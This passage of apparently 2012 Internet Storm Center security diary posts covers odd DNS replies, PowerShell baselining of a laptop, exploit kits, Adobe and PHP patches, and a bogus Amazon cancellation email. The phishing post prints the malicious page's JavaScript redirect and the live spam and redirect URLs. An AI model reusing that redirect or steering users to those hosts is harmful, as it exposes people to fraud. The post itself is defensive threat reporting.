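    duplicates = {}
    for key, sources in sources_by_query.items():
        queried_server = key[0]
        strays = sorted(sources - {queried_server})
        # Only report when the legitimate answer arrived as well.
        if queried_server in sources and strays:
            duplicates[key] = strays
    return duplicates


# Placeholder data: one query answered twice, one answered normally.
sample = [
    ("192.0.2.53", 0xB326, "ads.adsonar.akadns.net", "192.0.2.53"),
    ("192.0.2.53", 0xB326, "ads.adsonar.akadns.net", "10.17.0.1"),
    ("192.0.2.53", 0x1A2B, "example.com", "192.0.2.53"),
]
print(find_duplicate_replies(sample))
```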

Internet Protocol Version 4, Src: 10.17.x.y, Dst: ---removed---

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00

Total Length: 84

Identification: 0x2a7e (10878)

Flags: 0x00

Fragment offset: 0

Time to live: 59

Protocol: UDP (17)

Header checksum: correct

User Datagram Protocol, Src Port: domain (53), Dst Port: antidotemgrsvr (2247)

Domain Name System (response)

Transaction ID: 0xb326

Flags: 0x8400 (Standard query response, No error)

1... .... .... .... = Response: Message is a response

.000 0... .... .... = Opcode: Standard query (0)

.... .1.. .... .... = Authoritative: Server is an authority for domain

.... ..0. .... .... = Truncated: Message is not truncated

.... ...0 .... .... = Recursion desired: Don't do query recursively

.... .... 0... .... = Recursion available: Server can't do recursive queries

.... .... .0.. .... = Z: reserved (0)

.... .... ..0. .... = Answer not authenticated

.... .... ...0 .... = Non-authenticated data: Unacceptable

.... .... .... 0000 = Reply code: No error (0)

Questions: 1

Answer RRs: 1

Authority RRs: 0

Additional RRs: 0

Queries

ads.adsonar.akadns.net: type A, class IN

Name: ads.adsonar.akadns.net

Type: A (Host address)

Class: IN (0x0001)

Answers

ads.adsonar.akadns.net: type A, class IN, addr 207.200.74.25

Name: ads.adsonar.akadns.net

Type: A (Host address)

Class: IN (0x0001)

Time to live: 5 minutes

Data length: 4

Addr: 207.200.74.25 (207.200.74.25)
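The flag word in the dump above (0x8400) can be decoded by hand with a few bit masks. The sketch below follows the header layout from RFC1035; the function name and the dictionary keys are chosen for this example.

```python
def decode_dns_flags(flags):
    """Split the 16-bit DNS header flag word into its main fields."""
    return {
        "response": bool(flags & 0x8000),             # QR
        "opcode": (flags >> 11) & 0xF,                # 0 = standard query
        "authoritative": bool(flags & 0x0400),        # AA
        "truncated": bool(flags & 0x0200),            # TC
        "recursion_desired": bool(flags & 0x0100),    # RD
        "recursion_available": bool(flags & 0x0080),  # RA
        "rcode": flags & 0x000F,                      # 0 = no error
    }


print(decode_dns_flags(0x8400))
```

For 0x8400 this gives an authoritative response with no error and no recursion, which matches the Wireshark decode of the stray packet.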

http://www.faqs.org/rfcs/rfc1035.html

http://www.faqs.org/rfcs/rfc2181.html

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


Odd DNS replies from 10 nets and RFC1323 impacting firewalls

Reader Bob wrote in reporting seeing increasingly frequent incoming DNS replies on UDP 53, with valid DNS answers, but coming from source addresses in the 10.x.x.x/8 range. The responses appear to be from the Internet Roots to DNS servers that are querying the root.

Anyone else see this kind of behavior?

Over the past week another couple of readers have written in reporting issues accessing the ISC web page. The SANS NOC reports that RFC-1323 timestamps were getting scrubbed by our firewall to prevent information disclosure, but the checksum wasn't being updated. The packet was subsequently dropped by the end device.

This appears to be impacting users using Bluecoat web proxies. We will have more to post on this topic throughout the day.
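To illustrate why a scrubbed option with a stale checksum gets the packet dropped, here is a sketch of the Internet checksum arithmetic from RFC 1071. It only runs over a handful of hypothetical option bytes. The real TCP checksum also covers a pseudo-header and the rest of the segment, and overwriting the timestamp option with NOPs is an assumption about how such scrubbing might be done, not a description of our firewall.

```python
def internet_checksum(data: bytes) -> int:
    """16-bit one's complement checksum as described in RFC 1071."""
    if len(data) % 2:
        data += b"\x00"  # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


# Hypothetical option bytes: two NOPs, then a timestamp option (kind 8, length 10).
options = bytes([1, 1, 8, 10]) + (123456).to_bytes(4, "big") + (0).to_bytes(4, "big")
original = internet_checksum(options)

# The option is overwritten with NOPs, but the old checksum is left in place.
scrubbed = bytes([1] * len(options))
stale_checksum_still_valid = internet_checksum(scrubbed) == original
print(hex(original), stale_checksum_still_valid)
```

The receiver recomputes the checksum over the bytes it actually got, finds a mismatch, and silently discards the segment.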

Dan

Handler Internet Storm Center


Got packets? Interested in TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7

We have noticed an increase in scanning activity to ports TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7 and would love some packets if you have them.

- TCP/8909 - No idea what it is. A new one for me, and it is starting to trend.

- TCP/6666 - This is probably going to be IRC, but it would be nice to confirm and see what is being scanned for.

- TCP/9415 - This used to be associated with open proxies, but again it would be good to get some packets to check.

- TCP/27977 - My first thought was a gaming port, but that is just a guess.

- UDP/7 - echo, a blast from the past. Maybe they are looking for misconfigured or old routers and *nix boxes.

If you have any packets for the above ports, please submit them through the contact form or email them to handlers -at- sans.edu or directly to me markh.isc -at- gmail.com

Thanks in advance.

Mark H


Laptops at Security Conferences

I’m often curious what other security folks do to keep their machines safe when they go to IT conferences. I often see what look like standard office machines being used and wonder if any precautions have been taken. So here’s what I do, and I’d love to find out what other measures you take.

I’m about to spend a few days at a large security conference, so I’m just putting the finishing touches to the laptop I’m taking with me. As I don’t have any real needs beyond email, typing notes and web browsing, it’s a simple job of installing a clean OS and a couple of must have applications*. In keeping with Joel’s previous Diary, it took the duration of some reality TV show to install all the various patches for these apps to be up to date.





Now this is where I go through my normal additional hardening steps. This OS happens to be Windows 7, so I disable a bunch of services, kill IPv6 services, gleefully disable hibernation and add in a gaggle of firewall rules (or should that be an annoyance of firewall rules?).

The last thing I do is make a record of the clean state of the computer. This is the part I’m assuming most companies have if they have managed operating environments (MOE) or standard operating environments (SOE), as this is such an easy thing to do and provides a trusted baseline for the security teams to compare against.

In Windows there’s a bunch of ways to ask the computer what’s running and what services and software are installed, but I like PowerShell so here’s a quick and dirty way to get the info and save it to a file.

From a PowerShell prompt:

#Installed Software

gp HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName, DisplayVersion, Publisher, InstallDate, HelpLink, UninstallString | Out-File c:\build\base.txt

#Running processes

Get-Process | sort company | Format-Table ProcessName -GroupBy company | Out-File -Append c:\build\base.txt

#Services installed

Get-Service * | Out-File -Append c:\build\base.txt

This gives me three pieces providing a baseline** of the system.

I’m now ready to skip from vendor booth to vendor booth, keen to look at their product case studies conveniently supplied on handy novelty USB devices, while surfing the web on freely provided Wifi doing on-line banking, checking today’s nuclear launch codes and wondering why I keep seeing "Loading Please Wait" when clicking on links in emails from people I’ve never heard of. Although this is an attempt at humour (note: attempt), having a baseline of the clean machine allows me to identify the more obvious signs of something bad happening to my system.

If I do feel a disturbance in the force or the laptop does something odd, I can re-run my simple PowerShell commands (with a different output name) and look for changes.

#Comparing in PowerShell

Compare-Object -referenceobject $(Get-Content c:\build\base.txt) -differenceobject $(Get-Content c:\build\new.txt)

That gives me a quick indication of whether something has changed on my system (barring rootkits) and whether I need to worry about it.
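
For readers who want the same check outside PowerShell, the comparison can be sketched in Python. This is only a rough sketch, not the method used above: the function name `compare_baselines` and the sample process names are made up for illustration, and it merely approximates Compare-Object by reporting lines that appear in one snapshot but not the other, regardless of order.

```python
from collections import Counter


def compare_baselines(reference_lines, difference_lines):
    """Return (only_in_reference, only_in_difference), ignoring line order."""
    # Trailing whitespace is stripped so padded table output still matches.
    ref = Counter(line.rstrip() for line in reference_lines)
    new = Counter(line.rstrip() for line in difference_lines)
    removed = sorted((ref - new).elements())
    added = sorted((new - ref).elements())
    return removed, added


if __name__ == "__main__":
    # Hypothetical snapshot contents, for illustration only.
    base = ["svchost", "explorer", "lsass"]
    later = ["svchost", "explorer", "lsass", "unexpected"]
    removed, added = compare_baselines(base, later)
    for line in removed:
        print("<=", line)  # present only in the clean baseline
    for line in added:
        print("=>", line)  # present only in the new snapshot
```

In practice the two lists would come from reading the baseline file and the new snapshot file line by line.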

Let me know what you do or don't do when taking your system to a conference.

* I can’t say I’m a big fan of live CD/DVD/USB, I see their uses, but they get out of date, especially the browsers, far too quickly.

**If you want to get fancier with the base snapshot, it’s pretty easy to script that out to include registry keys, firewall rules and even files in directories with their cryptographic hashes.
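
As one possible take on the file-hash idea, here is a small Python sketch. The choice of SHA-256 and the function name `hash_tree` are my assumptions (the footnote does not name an algorithm or tool); it walks a directory and records one digest per file, so two runs can be compared later.

```python
import hashlib
from pathlib import Path


def hash_tree(root):
    """Map each file under root (relative path) to its SHA-256 hex digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                # Read in chunks so large files do not need to fit in memory.
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests
```

Comparing the dictionary from the clean build with one taken later shows which files were added, removed or modified. Files that cannot be read (locked or permission-restricted) would raise an error in this sketch and need handling in real use.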

Chris Mohan--- Internet Storm Center Handler on Duty

I’m mentoring SANS Hacker Guard 464 class in Sydney on the 7th of August - SysAdmins, this is for you! https://www.sans.org/mentor/class/sec464-sydney-aug-2012-mohan

Exploit Kits are a mess

As many of the Internet Storm Center readers know, my full time job is working for Sourcefire, the makers of SNORT, ClamAV, Razorback, Daemonlogger, and all of our commercial products. I work in the Vulnerability Research Team (VRT), where my job is to write detection for the above tools: Snort rules, ClamAV detection, etc. I often write about Snort-related things here, since I know the SANS audience uses Snort heavily, and it is even taught in the 503 course.

One of the areas that I've been looking at and following even more intently recently is exploit kits. I refer to things like Incognito, Blackhole, Crimepack, and many more.

Let me give you a couple of external references to go read in case you have no idea what I am talking about:

Brian Krebs has some blog posts here and here about some updates to it. But for a basic explanation of how the blackhole kit exploits you, the end user, I suggest this pdf here.

The Blackhole exploit kit in particular is very actively developed and changes rapidly in response to things that block its exploit methods. Trust me. As a person who follows all the particular versions of these exploit kits, I can tell you they change just about weekly.

You can be exploited by various kits simply by going to a website where some injected code rests on the page (you'll never see it - this is what we call a "drive by"), by receiving some spam (LinkedIn, USPS, UPS, I've even seen fake Pizza Delivery emails delivering things like the Phoenix Exploit kit) that redirects you to a "landing page", or by receiving spam with an html/htm email attachment. The possibilities are essentially endless on how you can wind up on an exploit kit landing page.

Once you are on the landing page, there are lots of different ways that the exploit kit figures out how to take over your computer, but the basic point of the landing page is "which piece of software didn't this user patch?". It probes for vulnerabilities in browsers and Java, and may even deliver a PDF to exploit a vulnerable version of Adobe Reader.

These kits are all over the place, and most likely, you are going to run into one of these (if you haven't already).

I basically have three pieces of advice for you.

1) Don't open spam or click on links inside of spam, and generally just be careful of the sites you go to. If you are reading this webpage, you know there is a 'wild west' to the Internet. Be careful.

2) Patch. Everything. Java, browsers, OS, Adobe Reader, etc. Everything. I literally cannot stress the importance of this enough.

3) Run AV and if you are on a corporate network, run an IPS.

This is an evolving threat. Nothing is going to protect you 100% of the time; however, the more layers you have, the more insulated you hopefully are against the threat, and the better you can protect yourself and your users.

Good Luck!

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Adobe Update to Vulnerabilities

Adobe released updates for three security vulnerabilities yesterday, addressing critical vulnerabilities that exist in older versions of the Adobe CS suite products. As Adobe states, “We are in the process of resolving the vulnerabilities addressed in these Security Bulletins in Adobe Illustrator CS5.x, Adobe Photoshop CS5.x (12.x) and Adobe Flash Professional CS5.x, and will update the respective Security Bulletins once the patches are available”.

The update released by Adobe can be found here, and the individual vulnerabilities are listed below:

Adobe Illustrator CS5.5

Adobe Photoshop CS5

Adobe Flash Professional CS5.5.1

These vulnerabilities are all critical; if exploited, they could lead to a compromise of the system without user interaction. They exist in both the Mac and Windows versions of the software. So be on the lookout for more updates for older versions of the Adobe CS suite.

tony d0t carothers -gmail

ISC Feature of the Week: Link List

Overview

The ISC Links page at https://isc.sans.edu/links.html is a categorized list of information links. You can get to the page from the top-right menu by choosing Tools->Links. The list lets you vote a link up or down and there's even a form to suggest new links! Results are not updated in real time. Voting and URL additions are subject to approval.

Features

Link List - https://isc.sans.edu/links.html#list

- Links are listed from most to least votes

- Categories: Internet Status, Malware Information, Security Dashboards, Security Blogs, Vendor Security Advisories

- Vote "in favor" or "against" a link

- You may vote as many times as you wish, but only one vote per URL will count.

Add a new Site - https://isc.sans.edu/links.html#add

- You must be logged in to submit links

- Category: Choose an appropriate category for your link

- URL: Paste in the url you wish to submit

- Site Name: Enter a name for the URL you are submitting

- Click Submit to suggest the link for the page

Some hints:

- Submit URLs that point to home pages / main pages, not to specific articles.

- The page should be related to infosec, internet status or any of the other categories

- If you submit a blog: It needs to have a few posts first.

- We try to avoid linking directly to sites providing exploits.

- Please let us know if we should add categories to the list.

Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

--

Adam Swanger, Web Developer (GWEB, GWAPT)

Internet Storm Center - https://isc.sans.edu

Safari 5.1.7 - an interesting feature

I am a Mac user, which means my daily browser is Safari. This has been the case for a number of years, until version 5.1.4 was released in mid-March. Since that time I have experienced excessive memory consumption, upwards of 1GB, as the cost of using Safari. Prior to that release, I observed no noticeable hit to my resources.

I updated my MacBook yesterday and noticed an improvement today. We'll have to see how long that lasts. It's been less than 24 hours, so it really is too early to tell.

With all that blather out of the way, an interesting feature can be noted in this most recent release of Safari: out-of-date Adobe Flash Players will be auto-disabled. [1] Use the link below to get a little more info on it. There is not much more, but it explains how to re-enable an out-of-date Flash player.

If you are unsure what plugin versions you have in your browser, then you can mosey over to Google and look for a popular "browsercheck" website. I would try out the link provided by a vendor that begins with a Q. It is a slick tool that I've used to check on my browser plugin versions.

Feel free to leave us a comment or remark about your Safari travels and experience with this new feature.

-Kevin

--

ISC Handler on Duty

[1] http://support.apple.com/kb/HT5271?viewlocale=en_US&locale=en_US

Bogus emails: Amazon.com - Your Cancellation

There are bogus order cancellation emails going around claiming to be from Amazon like this:

Dear Customer,

Your order has been successfully canceled. For your reference, here's a summary of your order:

You just canceled order 15-6698-2492 placed on May 9, 2012.Status: CANCELED

_____________________________________________________________________

1 "Mulberry"; 2006, Special Edition

By: Sorcha Stewart

Sold by: Amazon.com LLC

_____________________________________________________________________

Thank you for visiting Amazon.com!

---------------------------------------------------------------------

Amazon.com

Earth's Biggest Selection

http://www.amazon.com

---------------------------------------------------------------------

The 15-6698-2492 in the copy I received linked to the URL http://repdesign.pt/requires.html which contains this in the body:

<script type="text/javascript">window.location="http://leibypharmacylevitra.com";</script>

The web server seems to be down:

--2012-05-09 13:43:19-- (try: 7) http://leibypharmacylevitra.com/
Connecting to leibypharmacylevitra.com|37.157.249.2|:80...
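
If you want to pull the redirect target out of a page like this without opening it in a browser, a few lines of Python will do. This is a rough sketch under stated assumptions: the function name `find_js_redirects` is mine, and the pattern only catches the plain `window.location = "..."` form seen above, not obfuscated or computed redirects.

```python
import re

# Matches window.location = "..." or window.location.href = '...'
_REDIRECT = re.compile(
    r"""window\.location(?:\.href)?\s*=\s*(["'])(.*?)\1""",
    re.IGNORECASE,
)


def find_js_redirects(html):
    """Return the URLs assigned to window.location in the given HTML text."""
    return [m.group(2) for m in _REDIRECT.finditer(html)]
```

Feeding it the saved body of the linked page returns the destination as a string, which can then be checked against logs or blocklists without ever visiting it.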

The day after patch Tuesday; sometimes called Wednesday

This is my first diary entry in several years. I am returning as a handler after a lengthy hiatus. I joined an organization which took too much time and did not permit this kind of interaction. It was worth it. That ride is coming to a close and I am happy to be able to return to this fine organization.



Today many of us are working through the monthly onslaught of patches and updates. Between the Microsoft May 2012 updates, PHP, ESX, and some Adobe updates there is quite a bit to think about. This is a monthly occurrence though. There are a number of steps organizations can take to prepare for this recurring event. A simple one is to mark the second Tuesday on a team calendar. Start to clear the deck on the Friday before and make sure that test systems are ready to go following the Tuesday release.

I have seen a number of approaches to patch preparation. At one extreme, all critical systems are replicated in a lab, patches are applied and a QA team validates key functions. At the other extreme, patches are just applied and then the organization deals with the fallout. Not being an extremist, I like to land somewhere in the middle, depending on organization size, mission, and capability.

There is also the triage effort for reviewing updates and determining how long to wait to get updates applied. I have seen one organization that waited 10 days after the MSFT release and then applied all released patches, counting on the forums and general buzz about the updates to call out any problems with them. This, of course, can leave the organization open to many other risks if an exploit is in the wild.

I advocate a more hands-on approach, especially with key systems. The organization just mentioned ran into a problem recently where two RADIUS (IAS) servers were taken offline by a patch which modified the CA cert. This brought the IAS servers down, impacting wireless access for several hours while the problem was identified, investigated and resolved. Testing or patching one system at a time could have prevented or mitigated this outage.

What are some approaches that work and some that don’t? Care to share?
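
The "one system at a time" idea can be sketched as a simple loop. This is an illustration only, not a description of any particular patching tool: `rolling_patch`, `apply_patch` and `is_healthy` are hypothetical names, and the two callables stand in for whatever your environment uses to install updates and to verify a service afterwards.

```python
def rolling_patch(hosts, apply_patch, is_healthy):
    """Patch hosts one at a time; stop at the first host that fails its check.

    Returns (patched, failed), where failed is None if every host passed.
    """
    patched = []
    for host in hosts:
        apply_patch(host)
        if not is_healthy(host):
            # Remaining hosts are left untouched so the service stays up.
            return patched, host
        patched.append(host)
    return patched, None
```

With a pair of redundant servers, a failed health check on the first one leaves the second unpatched and still serving clients while the problem is investigated.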

--

Dan

MADJiC.net

PHP 5.4.3 and PHP 5.3.13 Released

In addition to other announcements, the folks behind PHP have released new versions in the 5.3 and 5.4 branches to address a couple of security issues.

5.3.13 addresses CVE-2012-2311 and 5.4.3 addresses both CVE-2012-2311 and CVE-2012-2329.

Details are available here: http://www.php.net/archive/2012.php#id2012-05-08-1

May Adobe Security Bulletins

Adobe has released their monthly security bulletins today:

- Security Bulletin for Adobe Illustrator - APSB12-10 - http://www.adobe.com/support/security/bulletins/apsb12-10.html

- Security Bulletin for Adobe Photoshop - APSB12-11 - http://www.adobe.com/support/security/bulletins/apsb12-11.html

- Security Bulletin for Adobe Flash Professional - APSB12-12 - http://www.adobe.com/support/security/bulletins/apsb12-12.html

- Security update available for Adobe Shockwave Player - APSB12-13 - http://www.adobe.com/support/security/bulletins/apsb12-13.html

Note that APSB12-12 addresses Flash Professional, not the Flash Player add-on for your browser. Also of note is that the first three bulletins simply inform users that their current version of the software is vulnerable, and that the upgraded version isn't. No free security patch options, just pay to upgrade. At least the Shockwave Player update is free.

Symantec False-Positive Issue with XLS Files - Bloodhound.Exploit.459